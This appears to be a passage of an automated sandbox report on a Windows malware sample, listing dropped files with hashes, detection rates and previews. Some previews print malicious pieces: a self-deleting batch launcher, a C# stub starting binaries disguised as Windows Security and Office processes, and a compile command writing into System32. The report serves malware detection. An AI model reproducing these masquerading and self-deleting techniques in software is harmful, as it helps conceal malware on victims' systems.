                                                                Category:dropped
                                                                Size (bytes):1964
                                                                Entropy (8bit):4.549616830759594
                                                                Encrypted:false
                                                                SSDEEP:24:HYnW9HOXAIHSfwK5NyluxOysuZhN7jSjRzPNnqpdt4+lEbNFjMyi0+hgUZ:epQIjK5MluOulajfqXSfbNtmhNZ
                                                                MD5:3AEE2A776541DD144295895338AFC9F4
                                                                SHA1:3FF19F9B0C9A1B8084976DDB3EDD384E255ACFB2
                                                                SHA-256:6B62C957FEBA0A938E69EE482A92D0CDB07D2EABE32ECA906A10227ECC6A2E62
                                                                SHA-512:BC293C47A755EA0F575CF6FDFBEFCD543059BF11D9853A2CDB43A83954A5B043746C97447A212D14AB78AB3FBC2E2854D92061915B4F0203842A4B4CFC27F86D
                                                                Malicious:false
                                                                Preview:L......g.............debug$S........D...................@..B.rsrc$01................p...........@..@.rsrc$02........p...................@..@........=....c:\Windows\System32\CSCBE040DD0C77A40C69F3560F59F6749C9.TMP.....................r.av..t.y..............5.......C:\Users\user\AppData\Local\Temp\RES520F.tmp.-.<....................a..Microsoft (R) CVTRES.e.=..cwd.C:\msproviderBrokerMonitornet.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe......................... .......8.......................P.......................h.......................................................|...............................................|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                File Type:ASCII text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):60
                                                                Entropy (8bit):4.038920595031593
                                                                Encrypted:false
                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                Malicious:false
                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:DOS batch file, ASCII text, with CRLF line terminators
                                                                Category:dropped
                                                                Size (bytes):176
                                                                Entropy (8bit):5.128558346346246
                                                                Encrypted:false
                                                                SSDEEP:3:mKDDVNGvTVLuVFcROr+jn9mDHusoZskWTd1covBktKcKZG1Ukh4E2J5xAIGkvcG:hCRLuVFOOr+DEDChWTZvKOZG1923fzvz
                                                                MD5:7B4F4320B6E51F892FFD5073BC3D621E
                                                                SHA1:7A4F48959B9E78AA6FF6DAB37CDC7CEC86C9B2AF
                                                                SHA-256:FFBFA3D7EE1DEB2439FF3D7D47C821969F07E3755C898D3CF627348D365B3221
                                                                SHA-512:17B7AF37560DDB94ECD592BF2BA8DF90D2C1FB3670B195A502CB156EF02F4B11389EC6ADEB10A1F846A16B71FFD92E9F7C0EB14A0156965F2B16A6E152FE6339
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                Preview:@echo off..chcp 65001..ping -n 10 localhost > nul..start "" "C:\msproviderBrokerMonitornet\WinPerfcommon.exe"..del /a /q /f "C:\Users\user\AppData\Local\Temp\\emoAWdy2Gj.bat"
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:C++ source, Unicode text, UTF-8 (with BOM) text
                                                                Category:dropped
                                                                Size (bytes):415
                                                                Entropy (8bit):4.989900425210691
                                                                Encrypted:false
                                                                SSDEEP:12:V/DNVgtDIbSf+eBLZ7bfiFkMSf+eBL6LSMdBu0qCaiFkD:JNVQIbSfhV7TiFkMSfhWLSMdU0qC7FkD
                                                                MD5:3F21D9EB2D80137DB736BC45959A85B9
                                                                SHA1:0E7EB6CB9AB91F9FFB112E8BA8A4CC13846848A3
                                                                SHA-256:B40ED5F6B1ECDD829D3F7F8927D27A24510BA9BBF251E0742987A79DC934F7FB
                                                                SHA-512:86352207854FE4890E3BABB679BB99778BB61FFAC5EEAD811970A7F46F44D6B88575F65BA1BDC8CFEFDE6A58D76058322FAA117CAC48AF8379380534222F17DF
                                                                Malicious:false
                                                                Preview:.using System.Diagnostics;.using System.Threading;..class Program.{. static void Main(string[] args). {. new Thread(() => { try { Process.Start(@"C:\Windows\system32\SecurityHealthSystray.exe.exe", string.Join(" ", args)); } catch { } }).Start();. new Thread(() => { try { Process.Start(@"C:\Program Files (x86)\windows portable devices\OfficeClickToRun.exe"); } catch { } }).Start();. }.}.
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
                                                                Category:dropped
                                                                Size (bytes):251
                                                                Entropy (8bit):5.06010373929633
                                                                Encrypted:false
                                                                SSDEEP:6:Hu+H2L//1xRT0T79BzxsjGZxWE8o923ftA0H:Hu7L//TRq79cQylA0H
                                                                MD5:C7297113F8051D498C4F1CEAFF8DE028
                                                                SHA1:647E7271D8545A97EA9DA5CBA093D1D6DA186FA5
                                                                SHA-256:19D1F15BBE89246B606D21D96E3351415C4FD7A8CE1F1B50F1403A4396F91302
                                                                SHA-512:BA61B75233C4E27563FA9AE30D4CDF646DB5EE6E11B747E5F5608C6EE8FF4964C03880ECEC39E744F90B5DE54DA2C4D8F86F10FCA6885396F66321E6176C3EC2
                                                                Malicious:false
                                                                Preview:./t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\imeik232\imeik232.0.cs"
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (337), with CRLF, CR line terminators
                                                                Category:modified
                                                                Size (bytes):758
                                                                Entropy (8bit):5.238501033275037
                                                                Encrypted:false
                                                                SSDEEP:12:yZzI/u7L//TRq79cQylA0OKaxK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:y9I/un/Vq79tylrOKax5DqBVKVrdFAMb
                                                                MD5:DBDAAA8B97FACF3BDB01837E489D5042
                                                                SHA1:A0B6E62C97C3A0B0ED5688EAECE667BE3C304D9F
                                                                SHA-256:A97B499425F58A8FD9142878DB61F95A5BB2305DD46AAE00F1F28F8A507E30E0
                                                                SHA-512:ABED02E8DD045AFE660E7DF4B9663A5FE2701C14A771CE1B2328A14EF634E9D9C1B88FA8E9995DB20F6CF38A74B503CFCC7BD9AC87F416CCDCE5BEF85253E474
                                                                Malicious:false
                                                                Preview:.C:\msproviderBrokerMonitornet> "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /t:exe /utf8output /R:"System.dll" /R:"System.Threading.dll" /R:"System.Data.dll" /out:"C:\Windows\system32\SecurityHealthSystray.exe" /debug- /optimize+ /optimize+ /target:winexe /unsafe "C:\Users\user\AppData\Local\Temp\imeik232\imeik232.0.cs"......Microsoft (R) Visual C# Compiler version 4.8.4084.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):33792
                                                                Entropy (8bit):5.541771649974822
                                                                Encrypted:false
                                                                SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                                MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                                SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                                SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                                SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 38%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....|............... ........@.. ....................................@.................................T...W.................................................................................... ............... ..H............text....z... ...|.................. ..`.rsrc................~..............@..@.reloc..............................@..B........................H.......Tl...............h..h....................................................................................................................................................................aF..g~Z........................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):24064
                                                                Entropy (8bit):5.492504448438552
                                                                Encrypted:false
                                                                SSDEEP:384:l22wC6hQRJUvdyLhbQPPRGAHInimWSVr3a/orMeOhB7FeyZufrC:YqsVQLV3AHInimWSVr3a/owtHsyGC
                                                                MD5:0EEEA1569C7E3EBBB530E8287D7ADCF9
                                                                SHA1:3C196FA10144566EBFBEE7243313314094F3A983
                                                                SHA-256:57E65CEFA95C6DC9139181DE7EC631174714F190D85127EB2955FB945A5F51DE
                                                                SHA-512:1A8614E5DE92B3F4377E40A1D7C9EC7A519E790EB7D0882F79B4C79509929F1FBF0520465764E1C1E8FD8FBB350985F01BF8E092043615E16B14B27DD140B860
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 33%
                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....".d...........!.....V...........u... ........@.. .............................."F....@.................................lu..O.................................................................................... ............... ..H............text....U... ...V.................. ..`.rsrc................X..............@..@.reloc...............\..............@..B.................u......H........P...$..........,P..x....................................................................................................................................................................(...@/.l#..r\.*................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):22016
                                                                Entropy (8bit):5.41854385721431
                                                                Encrypted:false
                                                                SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                                MD5:BBDE7073BAAC996447F749992D65FFBA
                                                                SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                                SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                                SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 9%
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):32256
                                                                Entropy (8bit):5.631194486392901
                                                                Encrypted:false
                                                                SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                                MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                                SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                                SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                                SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 25%
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):69632
                                                                Entropy (8bit):5.932541123129161
                                                                Encrypted:false
                                                                SSDEEP:1536:yo63BdpcSWxaQ/RKd8Skwea/e+hTEqS/ABGegJBb07j:j+9W+p/LEqu6GegG
                                                                MD5:F4B38D0F95B7E844DD288B441EBC9AAF
                                                                SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                                SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                                SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):85504
                                                                Entropy (8bit):5.8769270258874755
                                                                Encrypted:false
                                                                SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                                MD5:E9CE850DB4350471A62CC24ACB83E859
                                                                SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                                SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                                SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: Avira, Detection: 100%
                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                • Antivirus: ReversingLabs, Detection: 71%
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):23552
                                                                Entropy (8bit):5.519109060441589
                                                                Encrypted:false
                                                                SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                                MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                                SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                                SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                                SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 8%
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:ASCII text, with very long lines (723), with no line terminators
                                                                Category:dropped
                                                                Size (bytes):723
                                                                Entropy (8bit):5.885184387441015
                                                                Encrypted:false
                                                                SSDEEP:12:iMn8oSjN5ASB5n5fYMxBuOMwld5MTfydIYfdIc3emkyStWzAPu8Ge3dQFrMO:3n8oSw+hyO+TaIYfd73emkyS1m5GdwV
                                                                MD5:EB8756B0109F356CCDBCA1D2BD2F1E9E
                                                                SHA1:92017AF490F9DD01F535F0E50CD841BD5F09683A
                                                                SHA-256:25E05B868618129AC25803A7F7D261A57F5E1E0520DF7151D58DCAFBA44AF60C
                                                                SHA-512:5A16267B1C5803B06924D6CB7CBA102C4BCA37F7F90DEEC96E06D6426A4DB32BD93FA72BB3107438B04A5B6615F5070F578CC25C0AA5C0D6F98E1568888E04D8
                                                                Malicious:false
                                                                Process:C:\msproviderBrokerMonitornet\WinPerfcommon.exe
                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                Category:dropped
                                                                Size (bytes):2020864
                                                                Entropy (8bit):7.570829238606583
                                                                Encrypted:false
                                                                SSDEEP:49152:xh0kcmcdp/caMMlawkBXRInaKYRouPbWGQ2:xhbcmcfM/N1RSavoujWH
                                                                MD5:6B9554367A439D39A00A0DFF9A08B123
                                                                SHA1:E1D22CDE90C297C10F4FCBA5B3980E5D551EB0B3
                                                                SHA-256:3332277B9E53375E998CCF981CDB0519FEA7721B5E79A3D7A60B83F448F6C0A9
                                                                SHA-512:72FFBCA1A2AA7CD2BB6B963D97B43D7D5EAB9A11D09C647C7679E71877927B8C021E28CD1E28AE9AC5300C8621BA97AAE6699E1ABDDC58BE89C9BB3E84D1C720
                                                                Malicious:true
                                                                Antivirus:
                                                                • Antivirus: ReversingLabs, Detection: 63%
                                                                Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                File Type:MSVC .res
                                                                Category:dropped
                                                                Size (bytes):1224
                                                                Entropy (8bit):4.435108676655666
                                                                Encrypted:false
                                                                SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                                MD5:931E1E72E561761F8A74F57989D1EA0A
                                                                SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                                SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                                SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                                Malicious:false
